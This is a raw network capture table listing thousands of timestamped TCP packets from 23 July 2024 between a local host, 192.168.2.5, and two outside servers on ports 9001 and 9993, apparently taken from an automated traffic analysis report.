                                                                          Jul 23, 2024 15:47:21.102737904 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.102761984 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.102827072 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.102842093 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.102857113 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.102885962 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.102914095 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.102922916 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.102937937 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.102951050 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.102967978 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.102972984 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.103010893 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.103110075 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103189945 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103204966 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103219986 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103230953 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.103234053 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103251934 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.103266001 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103281975 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103296995 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103302002 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.103312969 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103336096 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.103415012 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103430033 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103446007 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103461981 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103463888 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.103477955 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103491068 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.103514910 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.103518963 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103533983 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103549004 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103574991 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.103627920 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103641987 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103657961 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103668928 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.103673935 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103692055 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103705883 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.103708029 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.103734016 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.103895903 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104005098 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104018927 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104033947 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104048967 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104049921 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.104064941 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104074001 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.104082108 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104087114 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.104099989 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104114056 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.104114056 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104130030 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104145050 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104160070 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.104160070 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104185104 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.104223967 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104238987 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104253054 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104260921 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.104269981 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104291916 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.104295015 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104310036 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104326010 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104341984 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104346991 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.104368925 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.104619980 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.104629993 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104666948 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104681015 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104696989 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104710102 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104715109 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.104722977 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.104765892 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.104772091 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104788065 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104804993 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104820967 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104826927 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.104850054 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.104872942 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.104887962 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104903936 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104918957 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.104924917 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.104943991 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.105022907 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105065107 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.105102062 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105119944 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105148077 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105161905 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105166912 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.105178118 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105187893 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.105194092 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105209112 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.105226994 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.105281115 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105339050 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105364084 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105379105 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105386019 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.105395079 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105401993 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.105412006 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105420113 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.105438948 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.105458975 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.105479956 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105494976 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105508089 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105515957 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.105532885 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105537891 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.105550051 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105552912 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.105564117 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105571985 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.105580091 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.105581045 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105598927 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.105607033 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.105643988 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.106944084 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.109458923 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.109517097 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.109527111 CEST497299001192.168.2.5193.142.146.239
                                                                          Jul 23, 2024 15:47:21.114418983 CEST900149729193.142.146.239192.168.2.5
                                                                          Jul 23, 2024 15:47:21.206305981 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.206330061 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.206356049 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.206372976 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.206501007 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.206501007 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.206732035 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.206753969 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.206777096 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.206785917 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.206800938 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.206803083 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.206820011 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.206834078 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.206849098 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.206850052 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.206864119 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.206885099 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.206887960 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.206904888 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.206912994 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.206923008 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.206929922 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.206938982 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.206954956 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.206957102 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.206981897 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.206993103 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207025051 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207040071 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207053900 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207068920 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207072973 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207083941 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207086086 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207098961 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207127094 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207139015 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207149982 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207151890 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207159996 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207169056 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207184076 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207191944 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207202911 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207212925 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207223892 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207242012 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207333088 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207346916 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207360983 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207375050 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207379103 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207386017 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207408905 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207417011 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207684040 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207710028 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207725048 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207735062 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207741022 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207758904 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207781076 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207801104 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207817078 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207829952 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207844973 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207845926 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207859993 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207870960 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207875967 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207890987 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.207897902 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207916975 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.207950115 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.208003998 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208019972 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208061934 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208069086 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.208077908 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208092928 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208103895 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.208127975 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.208138943 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.208190918 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208251953 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208266973 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208281994 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208291054 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.208306074 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.208319902 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208323002 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.208334923 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208350897 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208357096 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.208367109 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208372116 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.208401918 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.208401918 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.208585024 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208621025 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208633900 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208647013 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208673000 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208674908 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.208693981 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208707094 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208712101 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.208718061 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208729982 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208740950 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208743095 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.208769083 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.208779097 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208781958 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.208796978 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208808899 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208837032 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.208837986 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208858967 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208880901 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.208903074 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208914995 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208920956 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208928108 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208964109 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.208967924 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208980083 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.208991051 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209001064 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209009886 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.209033012 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.209054947 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209067106 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209076881 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209089041 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209095955 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.209124088 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.209131956 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209144115 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209155083 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209165096 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209168911 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.209192991 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209197998 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.209220886 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.209239006 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209248066 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.209250927 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209290028 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.209316015 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209332943 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209359884 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209367990 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.209378004 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.209382057 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209400892 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209403992 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.209427118 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209427118 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.209436893 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.209439039 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209450006 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209465981 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.209475994 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.209498882 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.209507942 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209520102 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209530115 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209541082 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.209548950 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.209569931 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.209598064 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.209634066 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.210628033 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.210697889 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.210716009 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.210724115 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.210727930 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.210740089 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.210757017 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.210787058 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.211302996 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.211313963 CEST99934973095.217.36.40192.168.2.5
                                                                          Jul 23, 2024 15:47:21.211389065 CEST497309993192.168.2.595.217.36.40
                                                                          Jul 23, 2024 15:47:21.211496115 CEST900149729193.142.146.239192.168.2.5
